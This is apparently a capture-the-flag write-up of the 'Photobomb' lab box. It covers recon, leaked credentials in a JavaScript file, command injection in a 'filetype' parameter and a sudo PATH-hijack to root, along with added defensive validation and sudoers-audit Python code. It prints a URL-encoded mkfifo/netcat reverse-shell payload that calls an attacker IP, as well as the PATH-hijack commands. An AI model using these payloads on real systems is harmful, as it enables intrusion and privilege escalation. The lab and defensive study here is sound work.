Photobomb

Target IP: 10.129.228.60
Challenge Description: N/A.


Reconnaissance

[Screenshot: nmap full TCP port scan output]
A SYN scan of all TCP ports with sudo nmap -sS 10.129.228.60 -p- shows two open ports on the target machine: SSH and HTTP on their standard ports (22 and 80), as shown above.

[Screenshot: nmap service and version scan of ports 22 and 80]
I performed an aggressive scan against those two TCP ports with sudo nmap -sV -A 10.129.228.60 -p 22,80 and obtained the result shown above. I will start enumeration with the HTTP application on port 80. Before that, I added the hostname photobomb.htb to my /etc/hosts file.


Enumeration

Port 80: HTTP
[Screenshot: photobomb.htb landing page]
The webpage above is displayed for this web application. I notice a hyperlink named click here! that appears to lead to a login.

[Screenshot: login prompt after clicking the link]
Clicking the click here! hyperlink prompts me to log in. However, I do not have any credentials yet. I tried default credentials such as admin:admin, but had no luck. I notice that on successful authentication the web application redirects to http://photobomb.htb/printer. Time to enumerate further.

[Screenshot: page source referencing photobomb.js]
The page source references a JavaScript file named photobomb.js, as shown above. Maybe I can find more information about the web application in its scripts?

[Screenshot: contents of photobomb.js]
And bingo! The photobomb.js file contains the credentials pH0t0:b0Mb!, as shown above. Time to put this to work. There is also another interesting name, Jameson -- maybe this is useful for SSH? I will note it down.

[Screenshot: authenticated /printer page with downloadable pictures]
I managed to log in with the credentials I found in the JavaScript file, as shown above. This page contains a number of pictures that I can download in different sizes and file types. I downloaded one picture as a test and it worked.

[Screenshot: intercepted download request in Burp Suite]
I started Burp Suite and pressed the Download Photo to Print button after selecting an image. After intercepting the request, I identified three interesting parameters: photo, filetype, and dimensions, as shown above. Maybe I can perform command injection? I had no luck with in-band command injection; however, I noticed that the filetype parameter is vulnerable to out-of-band command injection. The payload I tested was sleep(3), and the web application hung. Time to obtain a reverse shell connection.
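The root cause of the finding above is a request parameter that reaches a shell command line unvalidated. As an added example (not code from this write-up or from the Photobomb application), the module below shows how the download endpoint could validate photo, filetype and dimensions with allowlists and strict patterns, build the image-conversion command as an argv list rather than a shell string, and flag rejected values that carry shell syntax so they can be logged as probable injection attempts. The allowed file types, the photo name pattern, the ImageMagick convert backend and the sample values are all assumptions; the write-up does not list the application's real values.

```python
import re
from typing import Dict, List, Optional, Tuple

# Hypothetical allowlists: the write-up does not show the app's real file types
# or dimension format, so these values are assumptions for the example.
ALLOWED_FILETYPES = {"jpg", "png"}
PHOTO_RE = re.compile(r"^[A-Za-z0-9_-]+\.jpg$")
DIMENSIONS_RE = re.compile(r"^(\d{1,5})x(\d{1,5})$")
MAX_SIDE = 10000


def validate_download_request(params: Dict[str, str]) -> Tuple[Optional[Dict], List[str]]:
    """Return (clean_request, []) or (None, [names of rejected parameters]).

    Every value is matched against an allowlist or a strict pattern, so a
    metacharacter such as '|' or ';' in filetype never reaches a command line.
    """
    errors: List[str] = []
    photo = params.get("photo", "")
    filetype = params.get("filetype", "")
    dimensions = params.get("dimensions", "")

    if not PHOTO_RE.fullmatch(photo):
        errors.append("photo")
    if filetype not in ALLOWED_FILETYPES:
        errors.append("filetype")
    m = DIMENSIONS_RE.fullmatch(dimensions)
    width = height = 0
    if m:
        width, height = int(m.group(1)), int(m.group(2))
    if not m or not (1 <= width <= MAX_SIDE and 1 <= height <= MAX_SIDE):
        errors.append("dimensions")

    if errors:
        return None, errors
    return {"photo": photo, "filetype": filetype, "width": width, "height": height}, []


def build_convert_argv(req: Dict) -> List[str]:
    """Build an argv list for an ImageMagick convert call (assumed backend).

    Passing a list to subprocess.run without shell=True means no shell ever
    parses these values, which removes the injection point even if a
    validation rule were later relaxed.
    """
    return [
        "convert",
        req["photo"],
        "-resize",
        f"{req['width']}x{req['height']}",
        f"{req['filetype']}:-",
    ]


def shell_metacharacters(value: str) -> bool:
    """Detection helper: True when a submitted value carries shell syntax.

    A rejected request whose value trips this check is worth logging as a
    probable injection attempt rather than a simple user typo.
    """
    return bool(re.search(r"[|;&`$(){}<>\n]", value))


if __name__ == "__main__":
    # Constructed sample requests: one benign, one carrying a time-based probe
    for sample in (
        {"photo": "sample-photo.jpg", "filetype": "jpg", "dimensions": "3000x2000"},
        {"photo": "sample-photo.jpg", "filetype": "jpg|sleep 3", "dimensions": "3000x2000"},
    ):
        req, errs = validate_download_request(sample)
        if req:
            print("accepted, argv =", build_convert_argv(req))
        else:
            suspicious = [k for k in errs if shell_metacharacters(sample[k])]
            print("rejected:", errs, "suspicious:", suspicious)
```

The two controls are independent: the allowlist decides what the application accepts, and the argv-based invocation guarantees that whatever is accepted is passed as a literal argument. Logging rejected values that match shell_metacharacters gives the blue team a signal for the kind of probing described above.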


Exploitation

[Screenshot: reverse shell received on the listener]
I started a listener on my machine on port 8443. Then I placed the payload jpg|rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7C%2Fbin%2Fbash%20-i%202%3E%261%7Cnc%2010.10.14.132%208443%20%3E%2Ftmp%2Ff in the filetype parameter, and I received a reverse shell connection on port 8443, as shown above. I now have a foothold on the target machine as the wizard user.


Privilege Escalation

[Screenshot: sudo -l output for the wizard user]
Running sudo -l returns the result shown above. The entry (root) SETENV: NOPASSWD: /opt/cleanup.sh means the wizard user can run the script /opt/cleanup.sh as root through sudo without a password, and the SETENV tag means I can set arbitrary environment variables for that command.

[Screenshot: contents of /opt/cleanup.sh]
Running cat on /opt/cleanup.sh shows the script above. I notice the find binary is invoked without its full path, and the script seems to operate in the /home/wizard/photobomb directory. Therefore, I can create a malicious find binary in that directory and have the script run it to obtain a root shell :)

[Screenshot: root shell obtained via the fake find binary]
First, I created a script named find in /home/wizard/photobomb with the command echo "bash" > find. Then I made it executable with chmod +x find. Finally, I put that directory at the front of the PATH for the sudo command with sudo PATH=$PWD:$PATH /opt/cleanup.sh, so that when the script calls find it executes my script instead, which runs bash. And bingo! I now have a root shell on the target machine, as shown above. GG :)
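Two conditions combined to make this escalation possible: a sudo entry carrying SETENV, and a script run through it that resolves a command via PATH. As an added example (not the write-up's own code and not the box's real cleanup.sh), the audit script below parses sudo -l output, lists the commands a shell script invokes without an absolute path, reports entries where both conditions meet, and rewrites the script with absolute paths as the fix. The sudo -l entry is the one quoted above; the sample cleanup script is constructed, since the write-up shows the real one only as a screenshot, and /usr/bin/find as the binary's location is an assumption.

```python
import re
import shlex
from typing import Dict, List, Optional

# Shell words that are builtins/keywords rather than executables found via PATH
SHELL_BUILTINS = {
    "cd", "echo", "exit", "export", "if", "then", "else", "elif", "fi",
    "for", "do", "done", "while", "until", "read", "set", "test", "[", "]",
    "return", "shift", "local", ".", "source", "true", "false",
}

# Matches one entry of `sudo -l` output, e.g. "(root) SETENV: NOPASSWD: /opt/cleanup.sh"
SUDO_ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>/.*)$")

# Constructed sample of `sudo -l` output; the entry line is the one from the write-up
SAMPLE_SUDO_L = """User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh
"""

# Constructed stand-in for /opt/cleanup.sh (the real script is only shown as a screenshot)
SAMPLE_CLEANUP_SH = """#!/bin/bash
cd /home/wizard/photobomb
# rotate the application log
if [ -s log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi
# reset ownership of the originals
find source_images -type f -name '*.jpg' -exec chown root:root {} +
"""


def parse_sudo_entry(line: str) -> Optional[Dict]:
    """Parse one `sudo -l` command line into run-as user, tags and command."""
    m = SUDO_ENTRY_RE.match(line)
    if not m:
        return None
    tags = {t.strip() for t in m.group("tags").split(":") if t.strip()}
    return {"runas": m.group("runas"), "tags": tags, "command": m.group("cmd").strip()}


def unqualified_commands(script: str) -> List[str]:
    """Return the first word of every simple command that is resolved via PATH.

    Only the leading word of each pipeline segment is inspected, so commands
    passed as arguments (e.g. to find -exec or xargs) are not reported.
    """
    found: List[str] = []
    for raw in script.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and the shebang
        if not line:
            continue
        for segment in re.split(r"\|\||&&|\||;", line):
            try:
                words = shlex.split(segment)
            except ValueError:
                continue
            # skip leading VAR=value assignments
            while words and re.match(r"^[A-Za-z_]\w*=", words[0]):
                words.pop(0)
            if not words:
                continue
            cmd = words[0]
            if cmd in SHELL_BUILTINS or cmd.startswith(("/", "$")):
                continue
            found.append(cmd)
    return found


def audit_sudo_scripts(sudo_l_output: str, scripts: Dict[str, str]) -> List[str]:
    """Flag sudo entries where SETENV is combined with a script that relies on PATH."""
    findings: List[str] = []
    for line in sudo_l_output.splitlines():
        entry = parse_sudo_entry(line)
        if entry is None:
            continue
        bare = sorted(set(unqualified_commands(scripts.get(entry["command"], ""))))
        if "SETENV" in entry["tags"] and bare:
            findings.append(
                f"{entry['command']} runs as {entry['runas']} with SETENV and "
                f"calls {', '.join(bare)} without an absolute path (PATH hijack risk)"
            )
    return findings


def qualify_commands(script: str, resolved: Dict[str, str]) -> str:
    """Rewrite bare command names at the start of a line with absolute paths."""
    out: List[str] = []
    for raw in script.splitlines():
        m = re.match(r"^(\s*)(\S+)(.*)$", raw)
        if m and m.group(2) in resolved:
            raw = f"{m.group(1)}{resolved[m.group(2)]}{m.group(3)}"
        out.append(raw)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for finding in audit_sudo_scripts(SAMPLE_SUDO_L, {"/opt/cleanup.sh": SAMPLE_CLEANUP_SH}):
        print("FINDING:", finding)
    # /usr/bin/find is an assumed location; check with `command -v find` on the real host
    print(qualify_commands(SAMPLE_CLEANUP_SH, {"find": "/usr/bin/find"}))
```

Either half of the fix on its own closes this path: dropping the SETENV tag from the sudoers entry stops the caller from supplying PATH, and invoking every external command in the script by absolute path stops PATH from mattering. Doing both is the conservative choice, and the audit above is cheap enough to run against every NOPASSWD script on a host.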


Flags

[Screenshot: user and root flags]
Both flags are shown above.